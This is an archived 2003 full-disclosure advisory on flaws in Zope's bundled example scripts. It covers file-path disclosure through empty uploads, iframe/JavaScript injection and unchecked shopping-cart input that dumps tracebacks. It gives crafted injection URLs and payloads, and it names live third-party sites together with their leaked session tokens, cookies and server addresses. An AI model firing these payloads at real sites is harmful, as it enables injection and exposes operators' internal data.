| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: se_cur_ity at hotmail.com (morning_wood)
Subject: Zope
-= 0day - Freedom of Voice - Freedom of Choice =-
------------------------------------------------------------------
- EXPL-A-2003-009 exploitlabs.com Advisory 009
------------------------------------------------------------------
-=- The DoPe on zOpE -=-
Donnie Werner
June 19, 2003
http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt
Product:
--------
Zope -=- open source application server
http://www.zope.com/
Vunerability(s):
================
1 - Empty Upload ( physical location dump ) -=-
/Examples/FileLibrary/addFile
2 - Html / js injection -=- /Examples/db/
3 - Blank Query -=- /Examples/ShoppingCart
3a - iframe Query ( Html/js injection ) -=-
/Examples/ShoppingCart/addItems
3b - Unchecked Input Lenght -=- /Examples/ShoppingCart/addItems
3c - Unchecked Characters -=- /Examples/ShoppingCart/addItems
Remote:
-------
yup
not vurlnerable to #1 ( blank upload )
-----------------------------------
examples..
http://www.aixtraware.de/TCPware/Examples
Server: Zope/(Zope 2.6.1 (binary release, python 2.1, linux2-x86),
python 2.1.3, linux2) ZServer/1.1b1
http://ispg.csu.edu.au
Server: Zope/(Zope 2.5.1 (source release, python 2.1, linux2), python
2.1.3, freebsd4) ZServer/1.1b1
http://www.jungle2.org
Server: Zope/(Zope 2.5.1 (OpenBSD package zope-2.5.1p1), python 2.1.3,
openbsd3) ZServer/1.1b1
vurlnerable
-----------
Example URLS - #1:
http://klever.multimedia.fh-augsburg.de
Server: Zope/(Zope 2.6.1 (source release, python 2.1, linux2), python
2.1.3, linux2) ZServer/1.1b1
http://grlug.org/
Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.12
mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.2 PHP/4.1.2 mod_perl/1.26
http://grlug.org/zope/Examples/FileLibrary/addFile
Error...
Zope has encountered an error while publishing this resource.
Error Type: Bad Request
Error Value: Empty or invalid id specified.
Troubleshooting Suggestions
The URL may be incorrect.
The parameters passed to this resource may be incorrect.
A resource that this resource relies on may be encountering an error.
For more detailed information about the error, please refer to the
HTML source for this page.
If the error persists please contact the site maintainer. Thank you
for your patience.
Traceback (innermost last):
File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 150,
in publish_module
File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 114,
in publish
File /usr/local/src/zope/lib/python/Zope/__init__.py, line 159, in
zpublisher_exception_hook
(Object: FileLibrary)
File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 98,
in publish
File /usr/local/src/zope/lib/python/ZPublisher/mapply.py, line 88,
in mapply
(Object: addFile)
File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 39,
in call_object
(Object: addFile)
File /usr/local/src/zope/lib/python/Shared/DC/Scripts/Bindings.py,
line 252, in __call__
(Object: addFile)
File /usr/local/src/zope/lib/python/Shared/DC/Scripts/Bindings.py,
line 283, in _bindAndExec
(Object: addFile)
File
/usr/local/src/zope/lib/python/Products/PythonScripts/PythonScript.py,
line 302, in _exec
(Object: addFile)
(Info: ({'script': <PythonScript instance at 8c23a90>, 'context':
<Folder instance at 89548e0>, 'container': <Folder instance at
89548e0>, 'traverse_subpath': []}, (<ZPublisher.HTTPRequest.FileUpload
instance at 0x8b2eba4>,), {}, None))
File Script (Python), line 7, in addFile
File /usr/local/src/zope/lib/python/OFS/Image.py, line 52, in
manage_addFile
(Object: Files)
File /usr/local/src/zope/lib/python/OFS/ObjectManager.py, line 236,
in _setObject
(Object: Files)
File /usr/local/src/zope/lib/python/OFS/ObjectManager.py, line 53,
in checkValidId
(Object: Files)
Bad Request: (see above)
Example-1.2:
http://www.pitch.com
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.12
/Examples/FileLibrary/addFile
Site Error
An error was encountered while publishing this resource.
Error Type: Bad Request
Error Value: Empty or invalid id specified.
Traceback
Traceback (innermost last):
File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 98, in
publish
File /usr/local/zope/lib/python/ZPublisher/mapply.py, line 88, in
mapply
(Object: addFile)
File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 39, in
call_object
(Object: addFile)
File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line
252, in __call__
(Object: addFile)
File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line
283, in _bindAndExec
(Object: addFile)
File
/usr/local/zope/lib/python/Products/PythonScripts/PythonScript.py,
line 291, in _exec
(Object: addFile)
(Info: ({'script': , 'context': , 'container': ,
'traverse_subpath': []}, (,), {}, None))
File Script (Python), line 7, in addFile
File /usr/local/zope/lib/python/OFS/Image.py, line 52, in
manage_addFile
(Object: Files)
File /usr/local/zope/lib/python/OFS/ObjectManager.py, line 219, in
_setObject
(Object: Files)
File /usr/local/zope/lib/python/OFS/ObjectManager.py, line 53, in
checkValidId
(Object: Files)
Bad Request: Empty or invalid id specified.
======================================================================
==========================
======================================================================
==========================
Example-2.1:
http://www.c-media.com.au/Examples/db/ExampledbBrowseReport
http://198.78.66.174:8080/Examples/
exploit:
--------
edit the "discription" field for html / js injection
<iframe src=http://somesite.com</iframe>
viewing of the existing databse is rendered useless
======================================================================
==========================
======================================================================
==========================
Example-3:
http://www.sfweekly.com/Examples/ShoppingCart
enter a blank as a quanity entry
http://www.sfweekly.com/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=&orders.id%3Arecords=510-122&orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0
Site Error
An error was encountered while publishing this resource.
Error Type: ValueError
Error Value: invalid literal for int():
Traceback
Traceback (innermost last):
File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 98, in
publish
File /usr/local/zope/lib/python/ZPublisher/mapply.py, line 88, in
mapply
(Object: addItems)
File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 39, in
call_object
(Object: addItems)
File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line
252, in __call__
(Object: addItems)
File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line
283, in _bindAndExec
(Object: addItems)
File
/usr/local/zope/lib/python/Products/PythonScripts/PythonScript.py,
line 291, in _exec
(Object: addItems)
(Info: ({'script': , 'context': , 'container': ,
'traverse_subpath': []}, ([id: '510-007', quantity: '', id: '510-122',
quantity: '0', id: '510-115', quantity: '0'], formorders [id:
'510-007', quantity: '', id: '510-122', quantity: '0', id: '510-115',
quantity: '0'] cookies_ZopeId '23329946A0z9drL5xZk' Apache
'12.230.1.165.260541049326654641' lazy itemsother_ZopeId
'23329946A0z9drL5xZk' orders [id: '510-007', quantity: '', id:
'510-122', quantity: '0', id: '510-115', quantity: '0'] Apache
'12.230.1.165.260541049326654641' SESSION id: 10531690730759726137,
token: 23329946A0z9drL5xZk, contents: [('items', {})] traverse_subpath
[] SERVER_URL 'http://www.sfweekly.com' VirtualRootPhysicalPath ('',
'san') PUBLISHED <PythonScript instance at 9e01660> URL
'http://www.sfweekly.com/Examples/ShoppingCart/addItems'
AUTHENTICATED_USER Anonymous User TraversalRequestNameStack []
AUTHENTICATION_PATH 'san/virtual_hosts' URL0
http://www.sfweekly.com/Examples/ShoppingCart/addItems URL1
http://www.sfweekly.com/Examples/ShoppingCart URL2
http://www.sfweekly.com/Examples URL3 http://www.sfweekly.com BASE0
http://www.sfweekly.com BASE1 http://www.sfweekly.com BASE2
http://www.sfweekly.com/Examples BASE3
http://www.sfweekly.com/Examples/ShoppingCart BASE4
http://www.sfweekly.com/Examples/ShoppingCart/addItems
environDOCUMENT_ROOT '/home/nti/htdocs/san' SERVER_ADDR
'63.241.135.221' HTTP_ACCEPT_ENCODING 'gzip, deflate' SCRIPT_FILENAME
'/home/httpd/fastcgi/slave3' GATEWAY_INTERFACE 'CGI/1.1' SERVER_PORT
'80' PATH_TRANSLATED
'/home/httpd/fastcgi/slave3/VirtualHostBase/http/www.sfweekly.com:80/s
an/VirtualHostRoot/VirtualHostBase/http/www.sfweekly.com:80/san/Virtua
lHostRoot/Examples/ShoppingCart/addItems' source 'slave3' UNIQUE_ID
'PsYVuD-xh80AAEv9Xno' HTTP_ACCEPT_LANGUAGE 'en-us' REMOTE_ADDR
'12.229.234.100' SERVER_NAME 'www.sfweekly.com' HTTP_CONNECTION
'Keep-Alive' HTTP_USER_AGENT 'Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; USER AGENT)' HTTP_ACCEPT 'image/gif, image/x-xbitmap,
image/jpeg, image/pjpeg, application/x-shockwave-flash, */*'
REQUEST_URI
'/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.qu
antity%3Arecords=&orders.id%3Arecords=510-122&orders.quantity%3Arecord
s=0&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0' PATH
'/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin' QUERY_STRING
'orders.id%3Arecords=510-007&orders.quantity%3Arecords=&orders.id%3Are
cords=510-122&orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&
orders.quantity%3Arecords=0' SERVER_PROTOCOL 'HTTP/1.1' SCRIPT_URL
'/Examples/ShoppingCart/addItems' HTTP_HOST 'www.sfweekly.com'
REQUEST_METHOD 'GET' SERVER_SIGNATURE '' SCRIPT_URI
'http://www.sfweekly.com/Examples/ShoppingCart/addItems' SCRIPT_NAME
'' SITE 'san' SERVER_SOFTWARE 'Apache/1.3.27 (Unix) (Red-Hat/Linux)
mod_fastcgi/2.2.12' SERVER_ADMIN 'webadmin@...times.com' PATH_INFO
'/VirtualHostBase/http/www.sfweekly.com:80/san/VirtualHostRoot/Example
s/ShoppingCart/addItems' HTTP_COOKIE
'Apache=12.230.1.165.260541049326654641;
_ZopeId="23329946A0z9drL5xZk"' REMOTE_PORT '21891' HTTP_REFERER
'http://www.sfweekly.com/Examples/ShoppingCart/addItems?orders.id%3Are
cords=510-007&orders.quantity%3Arecords=0&orders.id%3Arecords=510-122&
orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&orders.quantit
y%3Arecords=0' ), {}, (None,)))
File Script (Python), line 11, in addItems
ValueError: invalid literal for int():
----------------------------------------------------------------------
----------
----------------------------------------------------------------------
----------
orders [id: '510-007', quantity: '0', id: '510-122', quantity: '', id:
'510-115', quantity: '0']
orders [id: '510-007', quantity: '0', id: '510-122', quantity: 'test',
id: '510-115', quantity: '0']
----------------------------------------------------------------------
----------
----------------------------------------------------------------------
----------
example 3a:
-----------
this i love...
insert a iframe into the unchecked length quanity field
<iframe src="http://ebay.com"></iframe>
<iframe src=http://ebay.com
<iframe src="http://ebay.com
http://www.jungle2.org/Examples/ShoppingCart
http://www.westword.com/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=0&orders.id%3Arecords=510-122&orders.quantity%3Arecords=%3Ciframe+src%3Dhttp%3A%2F%2Febay.com%3C%2Fiframe%3E&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0
<iframe src=http://ebay.com
GET
/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.qua
ntity%3Arecords=%3Ciframe+src%3Dhttp%3A%2F%2Febay.com&orders.id%3Areco
rds=510-122&orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&or
ders.quantity%3Arecords=0
HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*
Referer: http://www.westword.com/Examples/ShoppingCart/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; USER
AGENT)
Host: www.westword.com
Cookie: Apache=12.229.228.51.196431047271232157;
_ZopeId="50159375A0z9pTTmVlU"
Post injection url analysis:
----------------------------
puts this URL in a second frame before the main ebay.com frame,
injecting
and appending the original info to the exterlal url reference
resulting in 2 iframes as evidenced by:
<iframe src=http://ebay.com/
http://ebay.com/',
http://ebay.com',%20id:%20'510-122',%20quantity:%20'0',%20id:%20'510-115',%20quantity:%20'0'],%20<h3>form</h3><table><tr%20valign=
<iframe src=http://ebay.com
http://ebay.com',/
http://ebay.com/
<iframe src="http://ebay.com"></iframe>
http://ebay.com/
Example 3b - 3c:
----------------
Sending any string longer that 11 characters in the quanity field
causes a dump.
details here...
http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=123456789101112131415&orders.id%3Arecords=510-122&orders.quantity%3Arecords=+%3Ctd%3ENeed+to+go+out+of+town+for+a+few+days%2C+and+no+one+can+feed+your+pigeons%3F+Don%27t+worry%2C+we+now+have+the+virtually+spillproof+hopper+feeder.+Made+from+birch+plywood+it+holds+from+30+to+35+pounds+of+grain.+Pigeons+can+get+at+the+feed+through+holes+in+the+plexiglass+cover%2C+but+will+not+be+able+to+kick+out+any+feed.%3C%2Ftd%3E&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0
reveal these items..
SESSION id: 10546821410043251757, token: 40684361A01gE7Hjjvc,
contents: []
SERVER_URL 'http://www.sfweekly.com' VirtualRootPhysicalPath ('',
'san')
PUBLISHED <PythonScript instance at 96c4040>
URL 'http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems'
AUTHENTICATED_USER Anonymous User TraversalRequestNameStack []
AUTHENTICATION_PATH 'san/virtual_hosts'
URL0 http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems
URL1 http://www.sfweekly.com/calendar/Examples/ShoppingCart
URL2 http://www.sfweekly.com/calendar/Examples
URL3 http://www.sfweekly.com/calendar
URL4 http://www.sfweekly.com
BASE0 http://www.sfweekly.com
BASE1 http://www.sfweekly.com
BASE2 http://www.sfweekly.com/calendar
BASE3 http://www.sfweekly.com/calendar/Examples
BASE4 http://www.sfweekly.com/calendar/Examples/ShoppingCart
BASE5 http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems
environ
DOCUMENT_ROOT '/home/nti/htdocs/san'
SERVER_ADDR '63.241.135.221'
HTTP_ACCEPT_ENCODING 'gzip, deflate'
SCRIPT_FILENAME '/home/httpd/fastcgi/slave2'
GATEWAY_INTERFACE 'CGI/1.1'
SERVER_PORT '80'
PATH_TRANSLATED
'/home/httpd/fastcgi/slave3/VirtualHostBase/http/www.sfweekly.com:80/s
an/VirtualHostRoot/VirtualHostBase/http/www.sfweekly.com:80/san/Virtua
lHostRoot/calendar/Examples/ShoppingCart/addItems'
source 'slave2'
UNIQUE_ID 'Pt02bz-xh80AAC79HHU'
===================================================================
extra notes
===================================================================
Update of
/cvs-repository/Releases/Zope/lib/python/Products/PythonScripts
In directory cvs.zope.org:/tmp/cvs-serv29374/Products/PythonScripts
Modified Files:
Utility.py module_access_examples.py
Log Message:
Merge evan-modsec_fix-branch
=== Releases/Zope/lib/python/Products/PythonScripts/Utility.py 1.4 =>
1.5 ===
__version__='$Revision$'[11:-2]
-from AccessControl import ModuleSecurityInfo, ClassSecurityInfo
-from Globals import InitializeClass
-import string
-
-def allow_module(module_name):
- """Allow a module and all its contents to be used from a
- restricted Script. The argument module_name may be a simple
- or dotted module or package name. Note that if a package
- path is given, all modules in the path will be available."""
- ModuleSecurityInfo(module_name).setDefaultAccess(1)
- dot = string.find(module_name, '.')
- while dot > 0:
- ModuleSecurityInfo(module_name[:dot]).setDefaultAccess(1)
- dot = string.find(module_name, '.', dot + 1)
-
-def allow_class(Class):
- """Allow a class and all of its methods to be used from a
- restricted Script. The argument Class must be a class."""
- Class._security = sec = ClassSecurityInfo()
- sec.declareObjectPublic()
- sec.setDefaultAccess(1)
- sec.apply(Class)
- InitializeClass(Class)
+# These have been relocated, and should be imported from
AccessControl
+from AccessControl import allow_module, allow_class
===
Releases/Zope/lib/python/Products/PythonScripts/module_access_examples
.py 1.1 => 1.2 ===
'''
-from Products.PythonScripts.Utility import allow_module, allow_class
+from AccessControl import allow_module, allow_class, allow_type
from AccessControl import ModuleSecurityInfo, ClassSecurityInfo
from Globals import InitializeClass
@@ -42,9 +42,9 @@
# ModuleSecurityInfo('re').declarePublic('compile', 'findall',
# 'match', 'search', 'split', 'sub', 'subn', 'error',
# 'I', 'L', 'M', 'S', 'X')
-# from re import RegexObject, MatchObject
-# allow_class(RegexObject)
-# allow_class(MatchObject)
+# import re
+# allow_type(type(re.compile('')))
+# allow_type(type(re.match('x','x')))
# ModuleSecurityInfo('StringIO').declarePublic('StringIO'
Vendor Fix:
-----------
No fix on 0day
Vendor Contact:
---------------
info@...e.com - Concurrent with this advisory
Credits:
--------
Donnie Werner
http://exploitlabs.com "finding your holes"
morning_wood@...me4.com - get tested
----------------------------------------------------------------------
---
be a good vendor... test your products first, it is your problem, fix
it.
http://nothackers.org - it's t0day
----------------------------------------------------------------------
---
_______________________________________________
0day mailing list
0day@...hackers.org
http://nothackers.org/mailman/listinfo/0day
Powered by blists - more mailing lists